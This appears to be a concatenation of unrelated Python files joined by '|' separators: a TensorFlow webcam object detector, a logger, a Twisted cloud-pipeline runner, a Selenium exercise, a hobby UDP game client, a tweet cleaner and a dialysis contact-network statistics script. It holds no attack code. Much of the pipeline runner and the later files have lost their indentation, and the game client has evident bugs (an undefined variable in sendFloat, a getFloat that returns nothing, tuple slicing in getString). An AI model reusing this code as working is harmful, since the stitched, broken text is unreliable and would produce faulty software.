        with tf.gfile.GFile(MODEL, 'rb') as fid:
            serialized_graph = fid.read()
            od_graph_def.ParseFromString(serialized_graph)
            tf.import_graph_def(od_graph_def, name='')
    labels = read_labels(LABELS)
    # begin a tensorflow session
    detection_graph.as_default()
    sess = tf.Session(graph=detection_graph)
    # Get handles to input and output tensors
    ops = detection_graph.get_operations()
    all_tensor_names = {output.name for op in ops for output in op.outputs}
    tensor_dict = {}
    for key in ['num_detections', 'detection_boxes', 'detection_scores', 'detection_classes']:
        tensor_name = key + ':0'
        if tensor_name in all_tensor_names:
            tensor_dict[key] = detection_graph.get_tensor_by_name(
                tensor_name)
    image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
    # begin processing the default camera feed for your device:
    cap = cv2.VideoCapture(args.video)
    while True:
        ret, frame = cap.read()  # NOTE(review): `ret` is unchecked — a failed grab passes None downstream
        # run inference
        res = run_inference_for_single_image(frame, sess, tensor_dict, image_tensor)
        # view the bounding boxes:
        cv2_visualize_results(frame, res, labels)
        cv2.imshow('frame', frame)
        # quit if the user presses 'q' on the keyboard:
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    cap.release()
    cv2.destroyAllWindows()
## this example is partially based on code from tensorflow.org and Intel's ncappzoo
|
import logging
from .logger import Logger, format_config
class FileLogger(Logger):
    """Logger implementation that appends formatted messages to exec.log."""
    def __init__(self):
        self.logger = logging.getLogger(__name__)
        # Fix: getLogger returns a module-wide singleton, so without this
        # guard every FileLogger() instantiation attached ANOTHER
        # FileHandler and each message was written to exec.log once per
        # instance created.
        if not self.logger.handlers:
            self.logger.addHandler(logging.FileHandler('exec.log'))
        self.logger.setLevel(logging.DEBUG)

    def log(self, index, message):
        # NOTE(review): `index` is accepted but unused — confirm whether it
        # should appear in the formatted output.
        self.logger.info(
            format_config.format(message, 'single_job')
        )
|
import os
from twisted.python import log
from twisted.internet import defer
from twisted.internet import reactor
from igs.utils import logging
from igs.utils import config
from igs_tx import workflow_runner
from igs_tx.utils import global_state
from igs_tx.utils import defer_utils
from igs_tx.utils import ssh
from vappio_tx.pipelines import pipeline_misc
from vappio_tx.www_client import tags as tags_client
from vappio_tx.www_client import clusters as clusters_client
from vappio_tx.www_client import pipelines as pipelines_client
from vappio_tx.www_client import tasks as tasks_client
from vappio_tx.tasks import tasks
AUTOSHUTDOWN_REFRESH = 20 * 60       # seconds between autoshutdown keep-alive touches
CHILDREN_PIPELINE_REFRESH = 5 * 60   # seconds between child-pipeline progress polls
RETRIES = 3
TMP_DIR='/tmp'
# Pipeline lifecycle state names carried in batchState['pipeline_state'] / ['state'].
PRESTART_STATE = 'prestart'
STARTING_STATE = 'starting'
PRERUN_STATE = 'prerun'
RUN_PIPELINE_STATE = 'run_pipeline'
RUNNING_PIPELINE_STATE = 'running_pipeline'
POSTRUN_STATE = 'postrun'
RUNNING_STATE = 'running'
COMPLETED_STATE = 'completed'
FAILED_STATE = 'failed'
# Batch action types consumed by _createTags/_applyConfig.
TAG_FILE_ACTION = 'TAG_FILE'
TAG_URL_ACTION = 'TAG_URL'
TAG_METADATA_ACTION = 'TAG_METADATA'
CONFIG_ACTION = 'CONFIG'
class Error(Exception):
    """Base class for errors raised by this module."""
    pass
class TaskError(Error):
    """Raised when a vappio task cannot be updated or fails."""
    pass
def _log(batchState, msg):
    """Prefix *msg* with this batch's number and send it to the vappio log."""
    prefix = 'BATCH_NUM %d' % batchState['batch_num']
    logging.logPrint('%s - %s' % (prefix, msg))
@defer.inlineCallbacks
def _updateTask(batchState, f):
    """Apply transform `f` to this batch's clovr_wrapper task (when one has
    been created) and fire with the updated task."""
    if 'clovr_wrapper_task_name' in batchState:
        task = yield tasks.updateTask(batchState['clovr_wrapper_task_name'], f)
        # This is cheap, but we need a way for the pipelines cache to realize
        # the pipeline we just modified the task for has been changed.  We do
        # this by loading the config and resaving it, which causes an invalidation
        # in the cache.  There is not a more direct way for an outside process
        # to cause an invalidation yet.
        pipeline = yield pipelines_client.pipelineList('localhost',
                                                       'local',
                                                       'guest',
                                                       batchState['pipeline_name'],
                                                       detail=True)
        pipeline = pipeline[0]
        yield pipelines_client.updateConfigPipeline('localhost',
                                                    'local',
                                                    'guest',
                                                    {'pipeline_name': batchState['pipeline_name']},
                                                    pipeline['config'])
        defer.returnValue(task)
@defer.inlineCallbacks
def _createTags(actions):
    """Collect TAG_* actions into per-tag {'files','urls','metadata'} groups
    and overwrite each tag through the tags web client.

    Bug fix: the original indexed ``tags[action['key']]`` before that key
    existed, raising KeyError on the first action of every tag name;
    setdefault on the OUTER dict now creates the per-tag entry on demand.
    """
    tags = {}
    for action in actions:
        if action['action'] == TAG_FILE_ACTION:
            tags.setdefault(action['key'], {}).setdefault('files', []).append(action['value'])
        elif action['action'] == TAG_URL_ACTION:
            tags.setdefault(action['key'], {}).setdefault('urls', []).append(action['value'])
        elif action['action'] == TAG_METADATA_ACTION:
            # Metadata values arrive as 'k=v' strings.
            k, v = action['value'].split('=', 1)
            tags.setdefault(action['key'], {}).setdefault('metadata', {})[k] = v
    for tagName, values in tags.iteritems():
        yield tags_client.tagData('localhost',
                                  'local',
                                  'guest',
                                  'overwrite',
                                  tagName,
                                  values.get('files', []),
                                  values.get('metadata', []),  # NOTE(review): list default for a metadata dict — confirm tagData tolerates []
                                  False,
                                  False,
                                  False,
                                  values.get('urls', []))
def _applyConfig(pipelineConfig, actions):
    """Fold every CONFIG action into pipelineConfig (mutated in place) and
    return it.  Non-CONFIG actions are ignored; later actions win for a
    repeated key."""
    configActions = (a for a in actions if a['action'] == CONFIG_ACTION)
    for configAction in configActions:
        pipelineConfig[configAction['key']] = configAction['value']
    return pipelineConfig
@defer.inlineCallbacks
def _applyActions(innerPipelineConfig, actions):
    """Create any tags the actions describe, then fold CONFIG actions into
    the inner pipeline config; fires with the updated config."""
    yield _createTags(actions)
    defer.returnValue(_applyConfig(innerPipelineConfig, actions))
def _writeErgatisConfig(pipelineConfig, outputFile):
fout = open(outputFile, 'w')
# We want to produce an ini like file with [section]'s
sections = {}
for k in pipelineConfig.keys():
sections.setdefault('.'.join(k.split('.')[:-1]), []).append(k)
for s, ks in sections.iteritems():
if s not in ['', 'env']:
fout.write('[' + s + ']\n')
for k in ks:
shortK = k.split('.')[-1]
fout.write('%s=%s\n' % (shortK, str(pipelineConfig[k])))
fout.close()
@defer.inlineCallbacks
def _waitForPipeline(batchState):
    """Poll the remote pipeline task every 30 seconds until it completes;
    raises when the task enters the failed state."""
    while True:
        task = yield tasks_client.loadTask('localhost',
                                           batchState['pipeline_config']['cluster.CLUSTER_NAME'],
                                           'guest',
                                           batchState['pipeline_task'])
        if task['state'] == tasks.task.TASK_COMPLETED:
            break
        elif task['state'] == tasks.task.TASK_FAILED:
            raise Exception('Task failed - %s' % batchState['pipeline_task'])
        yield defer_utils.sleep(30)()
@defer.inlineCallbacks
def _monitorPipeline(batchState):
    """
    Monitors the current pipeline, propagating its children's progress
    (task counts) up to this batch's task; reschedules itself every
    CHILDREN_PIPELINE_REFRESH seconds while the pipeline is running.
    """
    pl = yield pipelines_client.pipelineList('localhost',
                                             'local',
                                             'guest',
                                             batchState['pipeline_name'],
                                             True)
    pl = pl[0]
    # Baseline counts for the local wrapper itself — presumably 6 wrapper
    # steps of which 4 are done once children are running (TODO confirm).
    numTasks = 6
    completedTasks = 4
    for cl, pName in pl['children']:
        try:
            _log(batchState, 'Loading child pipeline: (%s, %s)' % (cl, pName))
            remotePipelines = yield pipelines_client.pipelineList('localhost',
                                                                 cl,
                                                                 'guest',
                                                                 pName,
                                                                 True)
            remotePipeline = remotePipelines[0]
            _log(batchState, 'Loading task for child pipeline: %s' % remotePipeline['task_name'])
            remoteTask = yield tasks_client.loadTask('localhost',
                                                     cl,
                                                     'guest',
                                                     remotePipeline['task_name'])
            numTasks += remoteTask['numTasks']
            completedTasks += remoteTask['completedTasks']
        except Exception, err:
            # An unreachable child is skipped for this polling round.
            _log(batchState, 'Error in monitorPipeline: %s' % str(err))
    if pl['children']:
        _log(batchState, 'Updating task with numSteps=%d completedSteps=%d' % (numTasks, completedTasks))
        yield _updateTask(batchState,
                          lambda t : t.update(numTasks=numTasks,
                                              completedTasks=completedTasks))
    if batchState['pipeline_state'] == RUNNING_PIPELINE_STATE:
        reactor.callLater(CHILDREN_PIPELINE_REFRESH, _monitorPipeline, batchState)
@defer.inlineCallbacks
def _delayAutoshutdown(state, batchState):
    """Keep the remote cluster alive while this batch runs by periodically
    touching its delayautoshutdown marker file over SSH; reschedules itself
    every AUTOSHUTDOWN_REFRESH seconds until the batch completes."""
    _log(batchState, 'AUTOSHUTDOWN: Trying to touch autoshutdown file')
    try:
        clusters = yield clusters_client.listClusters('localhost',
                                                      {'cluster_name':
                                                           batchState['pipeline_config']['cluster.CLUSTER_NAME']},
                                                      'guest')
        cluster = clusters[0]
        if batchState.get('state', None) == COMPLETED_STATE:
            # Batch finished: stop rescheduling and let the cluster shut down.
            _log(batchState, 'AUTOSHUTDOWN: Pipeline complete, done')
        if batchState.get('state', None) != RUNNING_STATE:
            _log(batchState, 'AUTOSHUTDOWN: Pipeline not running, calling later')
            reactor.callLater(AUTOSHUTDOWN_REFRESH, _delayAutoshutdown, state, batchState)
        elif cluster['state'] == 'running':
            # We need the SSH options from the machine.conf, ugh I hate these OOB dependencies
            conf = config.configFromStream(open('/tmp/machine.conf'))
            _log(batchState, 'AUTOSHUTDOWN: Touching delayautoshutdown')
            yield ssh.runProcessSSH(cluster['master']['public_dns'],
                                    'touch /var/vappio/runtime/delayautoshutdown',
                                    stdoutf=None,
                                    stderrf=None,
                                    sshUser=conf('ssh.user'),
                                    sshFlags=conf('ssh.options'),
                                    log=True)
            _log(batchState, 'AUTOSHUTDOWN: Setting up next call')
            reactor.callLater(AUTOSHUTDOWN_REFRESH, _delayAutoshutdown, state, batchState)
        else:
            _log(batchState, 'AUTOSHUTDOWN: Cluster not running, calling later')
            reactor.callLater(AUTOSHUTDOWN_REFRESH, _delayAutoshutdown, state, batchState)
    except:
        # NOTE(review): bare except hides real errors as well as a missing
        # cluster; consider narrowing the exception type.
        _log(batchState, 'AUTOSHUTDOWN: Cluster does not exist, calling later')
        reactor.callLater(AUTOSHUTDOWN_REFRESH, _delayAutoshutdown, state, batchState)
@defer.inlineCallbacks
def _run(state, batchState):
if 'state' not in batchState:
_log(batchState, 'First time running, creating pipeline state information')
batchState['pipeline_config'] = yield _applyActions(state.innerPipelineConfig(),
batchState['actions'])
batchState['pipeline_state'] = PRESTART_STATE
# We need to create a fake, local, pipeline for metrics to work
batchState['pipeline_name'] = pipeline_misc.checksumInput(batchState['pipeline_config'])
batchState['pipeline_config']['pipeline.PIPELINE_NAME'] = batchState['pipeline_name']
batchState['pipeline_config']['pipeline.PIPELINE_WRAPPER_NAME'] = batchState['pipeline_name']
_log(batchState, 'Pipeline named ' + batchState['pipeline_name'])
pipeline = yield pipelines_client.createPipeline(host='localhost',
clusterName='local',
userName='guest',
pipelineName=batchState['pipeline_name'],
protocol='clovr_wrapper',
queue='pipeline.q',
config=batchState['pipeline_config'],
parentPipeline=state.parentPipeline())
batchState['clovr_wrapper_task_name'] = pipeline['task_name']
_log(batchState, 'Setting number of tasks to 6 (number in a standard clovr_wrapper)')
yield _updateTask(batchState,
lambda t : t.update(completedTasks=0,
numTasks=6))
state.updateBatchState()
else:
_log(batchState, 'Pipeline run before, loading pipeline information')
pipeline = yield pipelines_client.pipelineList('localhost',
'local',
'guest',
batchState['pipeline_name'],
detail=True)
batchState['state'] = RUNNING_STATE
yield _updateTask(batchState,
lambda t : t.setState(tasks.task.TASK_RUNNING))
pipelineConfigFile = os.path.join(TMP_DIR, 'pipeline_configs', global_state.make_ref() + '.conf')
_log(batchState, 'Creating ergatis configuration')
_writeErgatisConfig(batchState['pipeline_config'], pipelineConfigFile)
if batchState['pipeline_state'] == PRESTART_STATE:
_log(batchState, 'Pipeline is in PRESTART state')
yield state.prerunQueue.addWithDeferred(workflow_runner.run,
state.workflowConfig(),
batchState['pipeline_config']['pipeline.PRESTART_TEMPLATE_XML'],
pipelineConfigFile,
TMP_DIR)
yield _updateTask(batchState,
lambda t : t.addMessage(tasks.task.MSG_SILENT,
'Completed prestart'
).progress())
batchState['pipeline_state'] = STARTING_STATE
state.updateBatchState()
if batchState['pipeline_state'] == STARTING_STATE:
_log(batchState, 'Pipeline is in STARTING state')
clusterTask = yield clusters_client.startCluster(
'localhost',
batchState['pipeline_config']['cluster.CLUSTER_NAME'],
'guest',
int(batchState['pipeline_config']['cluster.EXEC_NODES']),
0,
batchState['pipeline_config']['cluster.CLUSTER_CREDENTIAL'],
{'cluster.master_type': batchState['pipeline_config']['cluster.MASTER_INSTANCE_TYPE'],
'cluster.master_bid_price': batchState['pipeline_config']['cluster.MASTER_BID_PRICE'],
'cluster.exec_type': batchState['pipeline_config']['cluster.EXEC_INSTANCE_TYPE'],
'cluster.exec_bid_price': batchState['pipeline_config']['cluster.EXEC_BID_PRICE']})
taskState = yield tasks.blockOnTask('localhost',
'local',
clusterTask)
if taskState != tasks.task.TASK_COMPLETED:
raise TaskError(clusterTask)
yield _updateTask(batchState,
lambda t : t.addMessage(tasks.task.MSG_SILENT,
'Completed start'
).progress())
batchState['pipeline_state'] = PRERUN_STATE
state.updateBatchState()
if batchState['pipeline_state'] == PRERUN_STATE:
_log(batchState, 'Pipeline is in PRERUN state')
yield state.prerunQueue.addWithDeferred(workflow_runner.run,
state.workflowConfig(),
batchState['pipeline_config']['pipeline.PRERUN_TEMPLATE_XML'],
pipelineConfigFile,
TMP_DIR)
yield _updateTask(batchState,
lambda t : t.addMessage(tasks.task.MSG_SILENT,
'Completed prerun'
).progress())
batchState['pipeline_state'] = RUN_PIPELINE_STATE
state.updateBatchState()
if batchState['pipeline_state'] == RUN_PIPELINE_STATE:
_log(batchState, 'Pipeline is in RUN_PIPELINE state')
pipeline = yield pipelines_client.runPipeline(host='localhost',
clusterName=batchState['pipeline_config']['cluster.CLUSTER_NAME'],
userName='guest',
parentPipeline=batchState['pipeline_name'],
bareRun=True,
queue=state.innerPipelineQueue(),
config=batchState['pipeline_config'],
overwrite=True)
batchState['pipeline_task'] = pipeline['task_name']
yield _updateTask(batchState,
lambda t : t.addMessage(tasks.task.MSG_SILENT,
'Completed run pipeline'
).progress())
batchState['pipeline_state'] = RUNNING_PIPELINE_STATE
state.updateBatchState()
if batchState['pipeline_state'] == RUNNING_PIPELINE_STATE:
_log(batchState, 'Pipeline is in RUNNING_PIPELINE state')
_monitorPipeline(batchState)
yield _waitForPipeline(batchState)
yield _updateTask(batchState,
lambda t : t.addMessage(tasks.task.MSG_SILENT,
'Completed running pipeline'
).progress())
batchState['pipeline_state'] = POSTRUN_STATE
state.updateBatchState()
if batchState['pipeline_state'] == POSTRUN_STATE:
_log(batchState, 'Pipeline is in POSTRUN state')
yield state.postrunQueue.addWithDeferred(workflow_runner.run,
state.workflowConfig(),
batchState['pipeline_config']['pipeline.POSTRUN_TEMPLATE_XML'],
pipelineConfigFile,
TMP_DIR)
yield _updateTask(batchState,
lambda t : t.addMessage(tasks.task.MSG_SILENT,
'Completed postrun'
).progress())
batchState['pipeline_state'] = COMPLETED_STATE
batchState['state'] = COMPLETED_STATE
state.updateBatchState()
yield _updateTask(batchState,
lambda t : t.setState(tasks.task.TASK_COMPLETED))
_log(batchState, 'Pipeline finished successfully')
def _runWrapper(state, batchState):
batchState.setdefault('retry_count', RETRIES)
d = _run(state, batchState)
@defer.inlineCallbacks
def _errback(f):
_log(batchState, 'There was an error in the pipeline, setting to failed')
log.err(f)
batchState['state'] = FAILED_STATE
yield _updateTask(batchState,
lambda t : t.setState(tasks.task.TASK_FAILED))
state.updateBatchState()
batchState['retry_count'] -= 1
if batchState['retry_count'] > 0:
yield run(state, batchState)
else:
# Since we are giving up, reset the counter so the next time we are called
# we will retry again
batchState['retry_count'] = RETRIES
state.updateBatchState()
defer.returnValue(f)
d.addErrback(_errback)
return d
def run(state, batchState):
_delayAutoshutdown(state, batchState)
return _runWrapper(state, batchState)
|
from selenium import webdriver
from selenium.webdriver.support.ui import Select
import time
import math
import os
try:
link = "http://suninjuly.github.io/redirect_accept.html"
browser = webdriver.Chrome()
browser.get(link)
btn1 = browser.find_element_by_css_selector('button')
btn1.click()
browser.switch_to.window(browser.window_handles[1])
x_el = browser.find_element_by_css_selector('[id="input_value"]')
x = int(x_el.text)
z = str(math.log(abs(12*math.sin(x))))
inpt = browser.find_element_by_css_selector('[id="answer"]')
inpt.send_keys(z)
# Отправляем заполненную форму
button = browser.find_element_by_css_selector("button.btn")
button.click()
finally:
# ожидание чтобы визуально оценить результаты прохождения скрипта
time.sleep(10)
# закрываем браузер после всех манипуляций
browser.quit()
|
#Gonna try and rewrite James' network class, so I can use scriptwars in Python
#Built by Jonathan Mace
#With James Brown watching over my shoulder like the beautiful coding angel he is
import socket
import struct
#I'm going to try and just bytes() this at the end before sending
#Though might need something more fancier, like start off with a byte array or smthng
dataOut = bytearray()
dataIn = []
#I feel like I shouldn't do this?
#Sets some global variables
ID = 0
bit = 0x100
positionOfByte = 0
IP = '52.65.69.217'
def connect(netID, ip, name):
global ID
global sock
global IP
global dataOut
#sendString(name)
ID = netID
IP = ip
protocol = netID >> 16 & 0xff
if protocol == 1:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print("Unable to connect!")
elif protocol == 2:
try:
print("TCP shit. as yet, not done")
except:
print("Unable to connect!")
else:
print("Invalid ID")
#Create the string shit to send
dataOut = buildDataOut(ID, name)
def nextTick():
global dataOut
global dataIn
sock.sendto(bytearray(dataOut), (IP, 35565))
dataOut = bytearray()
dataOut += (ID).to_bytes(4,'big')
dataIn = sock.recv(1024)
if dataIn == '':
return False
global position
position = 0
#Get the first byte and see if there are errors
errors = {1:"DISCONNECTED: The connection was terminated by the end of the game",
2: "FAILED_TO_KEEP_UP: The connection was terminated because the we couldn't keep up with the game tick"
}
headerByte = getByte()
if headerByte in [1,2]:
print("Error: {}".format(errors[headerByte]))
return False
elif headerByte == 255:
print("Error: ", end = '')
print(getString())
return False
elif headerByte == 0:
return True
else:
print("I told you James I should put this in here")
print("There's been a header byte we didn't plan for")
print("Please call your nearest James")
return False
return dataIn != ''
#Converts a string (or number or whatever) into a list of its characters. as bytes!!
#Then adds it to data out
def sendString(name):
global dataOut
dataOut += (len(bytes(name, 'utf-8'))).to_bytes(2,'big')
dataOut += bytearray(name, 'utf-8')
def sendByte(byte):
global dataOut
dataOut += byte.to_bytes(1,'big')
def sendInt(i):
global dataOut
dataOut += i.to_bytes(4,'big')
def sendFloat(f):
global dataOut
data += struct.pack('>f', f)
def sendData(data):
global dataOut
dataOut += data
#This adds your personal ID to the dataOut
def putHeader(ID):
dataOut.append(ID)
return
#Adds the ID to the start of the dataOut; something needed for every packet
def add_id(ID):
dataOut.append(ID.to_bytes(4,'big'))
'''
#this is debugging shit. ignore.
#sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#sock.connect((ip, 35565))
def sendstuff():
global sock
global IP
sock.sendto(x, (IP, 35565))
data = sock.recv(1024)
print(data)
'''
#First packet has just name
#This is first thing sent, dataOut does not yet have ID added to it
#So we need to add ID first
def buildDataOut(ID, name):
x = bytearray(ID.to_bytes(4,'big'))
x+= (len(bytes(name, 'utf-8'))).to_bytes(2,'big')
x += bytearray(name, 'utf-8')
return x
'''
* Gets a single byte from the data. This byte is returned as an integer in the
* range 0-255
* @return An integer containing the read byte.
*/
'''
def getByte():
global position
b = dataIn[position]
position += 1
return b
def getInt():
global position
i = struct.unpack('>i', dataIn[position: position + 4])[0]
position += 4
return i
def getString():
global position
length = struct.unpack('>h', dataIn[position:position+2])
position += 2
string = dataIn[position: position + length]
return string.decode()
def getBoolean():
global bit
global positionOfByte
global position
if(bit == 0x100 or positionOfByte != position - 1):
bit = 1
positionOfByte = position
position += 1
currentByte = dataIn[positionOfByte]
boolean = (currentByte & bit) != 0
bit <<= 1
return boolean
def getFloat():
global position
struct.unpack('>f', dataIn[position])
position += 4
def getData():
global dataOut
return dataOut
def getPointer():
global position
return position
def movePointer(n=1):
global position
position += n
def hasData():
global dataOut
return position < len(dataOut)
'''
To write code:
while nextTick()
then James said it should do everything you expect it to
'''
|
# Quick and dirty preprocessing of the tweet dfs: remove unrecognized languages, newline characters and hyperlinks
import pandas as pd
import os
from tqdm import tqdm
path = 'data/raw'
files = os.listdir(path)
tweets = sorted([i for i in files if 'Coronavirus Tweets' in i])
allowed_langs = ['en', 'es', 'fr', 'de', 'it', 'pt', 'ar', 'hi', 'ja', 'ko', 'zh', 'zh-TW']
total_removed = 0
for file in tqdm(tweets):
df = pd.read_csv(os.path.join(path, file))
l = len(df)
# remove all tweets in languages that aws can't recognize
df = df[df.lang.isin(allowed_langs)]
total_removed += l - len(df)
# remove newline characters
df.text = df.text.apply(lambda x: x.replace('\n', ' '))
df.text = df.text.apply(lambda x: x.replace('\r', ' '))
df.text = df.text.apply(lambda x: x.replace('\t', ' '))
df.text = df.text.apply(lambda x: x.replace(' ', ' '))
# move hyperlinks into separate column
df.text = df.text.apply(lambda x: x.split(' '))
df['hyperlink'] = df.text.apply(lambda x: (', ').join([i for i in x if i.startswith('https://')]))
# make separate hashtags column but keep them in the text (won't catch hashtags that aren't preceeded by spaces)
df['hashtag'] = df.text.apply(lambda x: (', ').join([i for i in x if i.startswith('#')]))
# make separate mentions column bu tkeep them in the text (won't catch at-mentions whtat aren't preceeded by spaces)
df['mention'] = df.text.apply(lambda x: (', ').join([i for i in x if i.startswith('@')]))
df.text = df.text.apply(lambda x: (' ').join([i for i in x if not i.startswith('https://')]))
date = file.split(' ')[0]
df.to_csv(os.path.join('data/preprocessed', date + '.csv'))
print('Preprocessed {} files. Removed {} tweets due to language constraints.'.format(len(tweets), total_removed)) |
"""
Author: Hankyu Jang
Email: hankyu-jang@uiowa.edu
Last Modified: Aug, 2020
Description: This script generates network statistics
"""
import argparse
# import igraph
import pandas as pd
import numpy as np
from graph_statistics import *
import networkx as nx
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Dialysis Unit')
parser.add_argument('-day', '--day', type=int, default=10,
help= 'day of csv file that contains the latent positions of hcws')
parser.add_argument('-d', '--contact_distance', type=int, default=6,
help= 'distance threshold (in feet)')
args = parser.parse_args()
day = args.day
contact_distance = args.contact_distance
# Load Patient arrays
npzfile = np.load("contact_data/patient_arrays_day{}_{}ft.npz".format(day, contact_distance))
hcw_patient_contact = npzfile["hcw_patient_contact_arrays"]
patient_patient_contact = npzfile["patient_patient_contact_arrays"]
npzfile.close()
simulation_period = hcw_patient_contact.shape[0]
# Load HCW arrays (note that there are 5 array. we're using only hcw_hcw_contact here.)
npzfile = np.load("contact_data/hcw_arrays_day{}_{}ft.npz".format(day, contact_distance))
hcw_hcw_contact = npzfile["hcw_hcw_contact"]
npzfile.close()
# Make hcw_hcw_contact in the same shape as other contact arrays, then zero out the contacts on Sunday
hcw_hcw_contact = np.repeat(np.expand_dims(hcw_hcw_contact, axis=0), simulation_period, axis=0)
hcw_hcw_contact[6,:,:,:] = 0
hcw_hcw_contact[13,:,:,:] = 0
hcw_hcw_contact[20,:,:,:] = 0
hcw_hcw_contact[27,:,:,:] = 0
hcw_hcw = hcw_hcw_contact.sum(axis=(0,-1))
hcw_patient = hcw_patient_contact.sum(axis=(0,-1))
patient_patient = patient_patient_contact.sum(axis=(0,-1))
n_hcw = hcw_patient.shape[0]
n_patient = hcw_patient.shape[1]
n_patient_MWF = n_patient // 2
n_total = n_hcw + n_patient
A = np.zeros((n_total, n_total)).astype(int)
A[:n_hcw, :n_hcw] = (hcw_hcw + hcw_hcw.T)
A[:n_hcw, n_hcw:n_total] = hcw_patient
A[n_hcw:n_total, :n_hcw] = hcw_patient.T
A[n_hcw:n_total, n_hcw:n_total] = (patient_patient + patient_patient.T)
G = nx.from_numpy_matrix(A, parallel_edges=False)
n, m, k_mean, k_max, std, cc, c, assortativity, n_giant, m_giant = generate_graph_statistics(G)
# Set node attributes
attrs = {}
for i in range(n_hcw):
attrs[i] = {"type": 'HCP'}
for i in range(n_hcw,n_total):
attrs[i] = {"type": 'patient'}
nx.set_node_attributes(G, attrs)
# Prepare a table on estra statistics.
index_list = ["overall degree", "overall weighted degree", "HCP degree", "HCP weighted degree", "patient degree", "patient weighted degree", "HCP-HCP edge weight", "HCP-patient edge weight", "patient-patient edge weight"]
column_name = ["mean", "std", "max"]
statistic_array = np.zeros((len(index_list), len(column_name)))
# degree
degree_dict = dict(G.degree)
degree_array = np.array(list(degree_dict.values()))
statistic_array[0] = [np.mean(degree_array), np.std(degree_array), np.max(degree_array)]
print("Overall")
print("degree. mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(degree_array), np.std(degree_array), np.max(degree_array)))
#weighted degree
weighted_degree_dict = dict(G.degree(weight='weight'))
weighted_degree_array = np.array(list(weighted_degree_dict.values()))
statistic_array[1] = [np.mean(weighted_degree_array), np.std(weighted_degree_array), np.max(weighted_degree_array)]
print("weighted degree. mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(weighted_degree_array), np.std(weighted_degree_array), np.max(weighted_degree_array)))
print("weighted degree (hrs/day). mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(weighted_degree_array)* 8 / 60 / 60 / 26, np.std(weighted_degree_array)* 8 / 60 / 60 / 26, np.max(weighted_degree_array)* 8 / 60 / 60 / 26))
#degree and weighted degree, just of HCPs
print()
print("HCP")
HCP_degree_array = degree_array[:n_hcw]
HCP_weighted_degree_array = weighted_degree_array[:n_hcw]
statistic_array[2] = [np.mean(HCP_degree_array), np.std(HCP_degree_array), np.max(HCP_degree_array)]
statistic_array[3] = [np.mean(HCP_weighted_degree_array), np.std(HCP_weighted_degree_array), np.max(HCP_weighted_degree_array)]
print("HCP_degree. mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(HCP_degree_array), np.std(HCP_degree_array), np.max(HCP_degree_array)))
print("HCP_weighted_degree. mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(HCP_weighted_degree_array), np.std(HCP_weighted_degree_array), np.max(HCP_weighted_degree_array)))
print("HCP_weighted_degree (hrs/day). mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(HCP_weighted_degree_array)* 8 / 60 / 60 / 26, np.std(HCP_weighted_degree_array)* 8 / 60 / 60 / 26, np.max(HCP_weighted_degree_array)* 8 / 60 / 60 / 26))
#degree and weighted degree, just of patients
print()
print("patient")
patient_degree_array = degree_array[n_hcw:]
patient_weighted_degree_array = weighted_degree_array[n_hcw:]
statistic_array[4] = [np.mean(patient_degree_array), np.std(patient_degree_array), np.max(patient_degree_array)]
statistic_array[5] = [np.mean(patient_weighted_degree_array), np.std(patient_weighted_degree_array), np.max(patient_weighted_degree_array)]
print("patient_degree. mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(patient_degree_array), np.std(patient_degree_array), np.max(patient_degree_array)))
print("patient_weighted_degree. mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(patient_weighted_degree_array), np.std(patient_weighted_degree_array), np.max(patient_weighted_degree_array)))
print("patient_weighted_degree (hrs/day). mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(patient_weighted_degree_array)* 8 / 60 / 60 / 26, np.std(patient_weighted_degree_array)* 8 / 60 / 60 / 26, np.max(patient_weighted_degree_array)* 8 / 60 / 60 / 26))
# preprocess for edge weights
HCP_HCP_edge_weights = []
HCP_patient_edge_weights = []
patient_patient_edge_weights = []
for edge in G.edges:
if edge[0] < n_hcw and edge[1] < n_hcw:
HCP_HCP_edge_weights.append(G.edges[edge]["weight"])
elif edge[0] >= n_hcw and edge[1] >= n_hcw:
patient_patient_edge_weights.append(G.edges[edge]["weight"])
else:
HCP_patient_edge_weights.append(G.edges[edge]["weight"])
#mean, max, std dev of weight of HCP-HCP edges
print()
print("weight of HCP-HCP edges")
HCP_HCP_edge_weights = np.array(HCP_HCP_edge_weights)
statistic_array[6] = [np.mean(HCP_HCP_edge_weights), np.std(HCP_HCP_edge_weights), np.max(HCP_HCP_edge_weights)]
print("mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(HCP_HCP_edge_weights), np.std(HCP_HCP_edge_weights), np.max(HCP_HCP_edge_weights)))
print("(hrs/day) mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(HCP_HCP_edge_weights)* 8 / 60 / 60 / 26, np.std(HCP_HCP_edge_weights)* 8 / 60 / 60 / 26, np.max(HCP_HCP_edge_weights)* 8 / 60 / 60 / 26))
#mean, max, std dev of weight of HCP-patient edges
print()
print("weight of HCP-patient edges")
HCP_patient_edge_weights = np.array(HCP_patient_edge_weights)
statistic_array[7] = [np.mean(HCP_patient_edge_weights), np.std(HCP_patient_edge_weights), np.max(HCP_patient_edge_weights)]
print("mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(HCP_patient_edge_weights), np.std(HCP_patient_edge_weights), np.max(HCP_patient_edge_weights)))
print("(hrs/day) mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(HCP_patient_edge_weights)* 8 / 60 / 60 / 26, np.std(HCP_patient_edge_weights)* 8 / 60 / 60 / 26, np.max(HCP_patient_edge_weights)* 8 / 60 / 60 / 26))
#mean, max, std dev or weight of patient-patient edges
print()
print("weight of patient-patient edges")
patient_patient_edge_weights = np.array(patient_patient_edge_weights)
statistic_array[8] = [np.mean(patient_patient_edge_weights), np.std(patient_patient_edge_weights), np.max(patient_patient_edge_weights)]
